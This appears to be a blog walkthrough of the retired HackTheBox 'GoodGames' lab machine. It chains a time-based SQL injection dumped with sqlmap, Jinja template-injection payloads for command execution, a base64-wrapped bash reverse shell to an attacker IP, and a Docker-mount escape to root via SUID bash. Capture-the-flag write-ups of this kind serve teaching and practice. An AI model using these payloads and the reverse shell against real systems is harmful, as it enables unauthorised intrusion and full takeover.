HackTheBox — GoodGames

ARZ101
7 min readFeb 22, 2022

--

Hello everyone , in this post I will be sharing my writeup for HTB-GoodGames machine which was an easy linux box that was made for the purpose of HTB University CTF hacking and was released into retired machines pool , starting off with nmap , we can see only port 80 is open on which there’s web page that allows us to login , the login page was vulnerable sqli which was a time based sql injection , through sqlmap we dumped the data through which we found admin hash for the web page , after cracking that we logged into the site and found another login page for a flask application which we got access through password reuse of admin user , being a flask application it was vulnerable to Server Side Template Injection SSTI which gave us a reverse shell from command execution and we landed in a docker container . The container had mounted a file system of host machine specifically home directory of augustus , after putting the ssh public key there we were able to login on the host machine as the gateway IP of docker was of host machine and since we had access to that directory and files were being created as a root user we were able to put a copy of bash with SUID and get root on the host machine.

NMAP

PORT   STATE SERVICE  VERSION
80/tcp open ssl/http Werkzeug/2.0.2 Python/3.9.2
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS POST
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store

PORT 80 (HTTP)

Visting port 80 it shows us about a gaming page where it lists the current games

But it’s just a static page where these links won’t lead to anywhere , there’s a page to a store which says that it will be available soon

There’s a login page but it asks for an email address so I left this form , and went with signing up a user

After creating a user we can login on the site

With the password reset , I tried to see if it was taking a user name in the parameters

It wasn’t taking any username so taking a step back on the login page

We can’t perform sqli like this as it’s matching the format of an email address so , I intercepted the request with burp and save the request , after that ran sqlmap

This shows that it’s vulnerable to sqli , so let’s just dump the database.

Being a time based sqli , it was taking some time to dump the data , so we only want the users table so let’s just dump that

sqlmap -r sql --batch -D main -T user --dump

We can then just skip the rest of the data as we only needed the admin hash, using crackstation to crack hash we can get the password superadministrator

So logging with the admin credentials

On becoming admin , we can see another options which would take us to internal-administration.goodgames.htb

This brings us another login page for Flask Volt

I looked if there were any default credentials for this but it seems that it’s just a template on github for flask applications login page and being a flask application it might be vulnerable to one of the common attacks which is Server Side Template Injection SSTI maybe as this is the first thing that I would look at

So now let’s look for an input field where we can test for SSTI payloads

Setting page has an input field for username , so testing with payload {{7*7}} it should return the result 49

It did now we need to find which template engine it’s using , to do that we can check with payload {{7*'7'}} , if it still returns the result 49 that means it's using twig or if it returns 7777777 then it's using jinja

So it’s jinja , now we need to look for payload to get command execution

{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}

Using this payload we can execute shell commands

This returns as a root user , normally you would get a low privileged user like www-data or some other user could be that this application is hosted in a docker container , using bash reverse shell we can get a shell by first convert the reverse shell payload to base64

echo "bash -i >& /dev/tcp/10.10.14.77/2222 0>&1" | base64{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC43Ny8yMjIyIDA+JjEK" |base64 -d| bash').read() }}

Running ifconfig

This IP address tells that we are indeed inside in a container , running df -h to see disk space we can see a directory /home/augustus from /dev/sda1 as this user doesn't exist on this docker container this probably mounted from the host machine

So here I thought of adding an ssh for augustus by creating a .ssh folder and adding the public key in authorized_keys file

And then changing the owner of that folder to augustus

But the host machine didn’t had ssh service running when we ran nmap , could be that it’s open locally or we can access it from the container

We can’t , we know that this container’s IP address is 172.19.0.2 and whenever we run a docker container on a host machine that machine becomes a gateway and the IP is assigned to 172.19.0.1

Let’s verify this by transferring a static binary of nmap

This shows that port 80 and 22 is open , so let’s give it a shot

And we are on the host machine now

Running sudo -l to see what permissions we have but there's no sudo binary

So going back again , we saw that we can change permissions in augustus’s folder ,so let’s just create a file and see if it gets reflected with the room permissions

Logging back again , we see that the file has root permissions , so we can just copy bash , make it a SUID and run it on the host machine

But it didn’t ran and started screaming about a library file so I transferred my host machine’s bash file on the docker container , made that a SUID again and then tried running the binary and it worked

References

--

--

ARZ101
ARZ101

Written by ARZ101

Smol Pentester| OSCP | CTF Player | UwU

Responses (1)